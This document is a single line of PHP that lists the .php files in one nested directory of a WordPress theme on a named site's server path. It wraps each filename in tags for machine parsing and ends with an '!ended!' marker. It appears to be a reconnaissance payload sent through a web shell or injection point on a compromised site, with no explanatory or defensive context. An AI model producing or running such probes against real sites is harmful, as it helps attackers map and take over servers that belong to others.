<?php foreach (glob("/home/mobilech/nepalapplesupport.com/wp-content/themes/edubin/inc/customizer/kirki/kirki-composer/composer/installers/src/Composer/Installers/*.php") as $filename) { echo "<f>".basename($filename)."</f>"; } die('!ended!');